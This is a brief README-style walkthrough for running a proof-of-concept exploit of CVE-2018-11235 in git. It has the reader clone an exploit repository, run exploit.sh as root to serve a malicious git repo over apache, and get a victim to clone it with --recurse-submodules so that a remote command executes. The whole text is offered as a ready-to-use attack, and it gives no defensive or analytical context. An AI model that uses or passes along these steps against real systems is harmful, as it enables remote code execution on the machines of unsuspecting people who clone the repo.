
exploit poc for CVE-2018-11235
ssh to your vps.git clone https://github.com/Rezy-Dev/CVE-2018-11235
cd CVE-2018-11235
exploit.sh execute (x) permission then execute it:sudo chmod +x exploit.sh
sudo ./exploit.sh
It downloads apache2 and builds malicious repo for us.
http://vps-ip/malicious.git as a git repo.git clone --recurse-submodules http://vps-ip/malicious.git
The payload rce command should execute.
Thank you!